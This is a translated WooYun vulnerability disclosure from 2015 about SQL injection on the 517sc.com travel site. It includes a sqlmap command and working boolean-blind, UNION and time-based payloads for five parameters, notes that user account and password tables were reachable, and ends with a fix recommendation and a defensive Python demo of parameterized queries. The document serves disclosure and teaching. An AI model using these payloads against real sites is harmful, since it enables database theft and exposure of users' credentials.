
Vulnerability summary

Defect ID: wooyun-2015-095440

Title: Numerous SQL injection points on the main site of Sichuan 517 Travel (四川517旅行网)

Vendor: 四川旅游网 (Sichuan Tourism Network)

Author: 大物期末不能挂

Submitted: 2015-02-04 15:18

Fix deadline: 2015-03-21 15:20

Disclosed: 2015-03-21 15:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-02-04: Vendor contacted, awaiting the vendor's acknowledgement; details not disclosed publicly.
2015-03-21: The vendor has actively ignored the report; details disclosed to the public.

Brief description:

I submitted one injection point earlier; after going over the site again, I am now submitting all of the injection points.

Detailed description:

The first injection point found earlier:

sqlmap.py -u "http://www.517sc.com:80/n/index.php?m=lists&a=index&day=7&max_day=0&typeId=3" --dbms "Mysql" --dbs


[screenshot: exploitable databases (可利用数据库.png)]


33 tables in total

[screenshot: table names (表名.png)]


These include user accounts and passwords

[screenshot: sc_member.png]


After re-examining the whole site, I found the following additional injection points:

http://www.517sc.com/n/index.php?m=news&a=details&newsId=1332
newsId is the injectable parameter
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: newsId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: m=news&a=details&newsId=1332) AND 9270=9270 AND (8831=8831
Type: UNION query
Title: MySQL UNION query (89) - 7 columns
Payload: m=news&a=details&newsId=-3434) UNION ALL SELECT 89,89,89,CONCAT(0x71796d7371,0x6c547355546471577455,0x7172657071),89,89,89#
---


http://www.517sc.com/n/index.php?m=cms&a=index&cmsId=16
cmsId is the injectable parameter
sqlmap identified the following injection points with a total of 364 HTTP(s) requests:
---
Place: GET
Parameter: cmsId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: m=cms&a=index&cmsId=16) AND 2287=2287 AND (5874=5874
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: m=cms&a=index&cmsId=-1217) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71796d7371,0x426c6f45456250497043,0x7172657071),NULL,NULL,NULL,NULL#
---


http://www.517sc.com/n/index.php?m=scenic&a=details&scenicId=184
scenicId is the injectable parameter
sqlmap identified the following injection points with a total of 362 HTTP(s) requests:
---
Place: GET
Parameter: scenicId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: m=scenic&a=details&scenicId=184) AND 4973=4973 AND (5155=5155
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: m=scenic&a=details&scenicId=-5770) UNION ALL SELECT NULL,CONCAT(0x71796d7371,0x426f58594a78566c756a,0x7172657071),NULL,NULL,NULL,NULL#
---


http://www.517sc.com/n/index.php?m=hotel&a=details&hotelId=47
hotelId is the injectable parameter
sqlmap identified the following injection points with a total of 359 HTTP(s) requests:
---
Place: GET
Parameter: hotelId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: m=hotel&a=details&hotelId=47) AND 4125=4125 AND (3254=3254
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: m=hotel&a=details&hotelId=47) UNION ALL SELECT NULL,NULL,CONCAT(0x71796d7371,0x4573456e457458484a5a,0x7172657071),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: m=hotel&a=details&hotelId=47) AND SLEEP(5) AND (2723=2723
---


http://www.517sc.com/n/index.php?m=details&a=LineDetails&lineId=44
lineId is the injectable parameter
sqlmap identified the following injection points with a total of 357 HTTP(s) requests:
---
Place: GET
Parameter: lineId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: m=details&a=LineDetails&lineId=44) AND 6162=6162 AND (5032=5032
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: m=details&a=LineDetails&lineId=44) UNION ALL SELECT CONCAT(0x71796d7371,0x63465959666451665047,0x7172657071),NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: m=details&a=LineDetails&lineId=44) AND SLEEP(5) AND (7030=7030
---

Proof of vulnerability:

[screenshot: exploitable databases (可利用数据库.png)]

33 tables in total

[screenshot: table names (表名.png)]

These include user accounts and passwords

[screenshot: sc_member.png]

Fix recommendation:

Validate and filter input; many parameters need it. Every injectable parameter listed above (newsId, cmsId, scenicId, hotelId, lineId) is a numeric ID, so at minimum cast each one to an integer before it reaches a query, and preferably use prepared statements with bound parameters for every database query so that user input is never spliced into SQL text.
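The example below is added here to illustrate the injection pattern behind the sqlmap findings above and the fix just recommended; it is not code from 517sc.com or from the report's author. The site runs PHP on MySQL; this stand-in uses Python with an in-memory SQLite table (the `news` table, its columns and the sample rows are constructed for the example). The parenthesised `WHERE (newsId=...)` form is inferred from the reported payload `newsId=1332) AND 9270=9270 AND (8831=8831`, which only parses if the application wraps the value in parentheses. Only the boolean-based blind payloads are replayed, because they use syntax common to SQLite and MySQL; the UNION payloads rely on MySQL-only `#` comments and hex string literals and are left out.

```python
"""Vulnerable vs. hardened lookup for a numeric ID parameter (added example).

Assumptions (not from the report): table `news(newsId, title)`, the sample
rows below, and that the original query was `... WHERE (newsId=<value>)`.
"""
import sqlite3

# Constructed sample data standing in for the site's news table.
SAMPLE_ROWS = [
    (1332, "Spring travel routes announced"),
    (1333, "Hotel promotion"),
]

# Boolean-based blind payloads in the exact shape sqlmap reported for newsId.
TRUE_PAYLOAD = "1332) AND 9270=9270 AND (8831=8831"   # taken from the report
FALSE_PAYLOAD = "1332) AND 9270=9271 AND (8831=8831"  # same shape, false condition
DUMP_PAYLOAD = "-1) OR (1=1"                          # returns every row


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (newsId INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?)", SAMPLE_ROWS)
    return con


def news_details_vulnerable(con, news_id: str):
    # The raw GET value is spliced into the SQL text, so a value ending in
    # `)` closes the application's parenthesis and the attacker controls
    # everything after it.
    sql = f"SELECT newsId, title FROM news WHERE (newsId={news_id})"
    return con.execute(sql).fetchall()


def news_details_fixed(con, news_id: str):
    # Layer 1: the parameter is an ID, so anything but digits is rejected.
    if not news_id.isdigit():
        raise ValueError("newsId must be a positive integer")
    # Layer 2: bind the value instead of building SQL text from it.
    sql = "SELECT newsId, title FROM news WHERE (newsId = ?)"
    return con.execute(sql, (int(news_id),)).fetchall()


def blind_probe(con, query_fn, true_payload, false_payload):
    """What sqlmap's boolean-based blind check does: send a true and a false
    condition and compare the responses. A difference means the condition
    was evaluated by the database, i.e. the parameter is injectable."""
    return query_fn(con, true_payload) != query_fn(con, false_payload)


def demo():
    con = make_db()
    results = {}
    # Vulnerable handler: the true/false responses differ and the whole
    # table can be pulled with an always-true condition.
    results["vulnerable_differs"] = blind_probe(
        con, news_details_vulnerable, TRUE_PAYLOAD, FALSE_PAYLOAD)
    results["vulnerable_dump"] = len(news_details_vulnerable(con, DUMP_PAYLOAD))
    # Hardened handler: the payload never reaches the database.
    try:
        blind_probe(con, news_details_fixed, TRUE_PAYLOAD, FALSE_PAYLOAD)
        results["fixed_rejects"] = False
    except ValueError:
        results["fixed_rejects"] = True
    # And legitimate requests still work.
    results["fixed_normal"] = news_details_fixed(con, "1332")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The integer check alone would already stop these particular payloads, but the bound parameter is the fix that holds for every query on the site, including string parameters that cannot be reduced to `isdigit()`.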

Copyright notice: please credit 大物期末不能挂@乌云 when reposting


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively declined to respond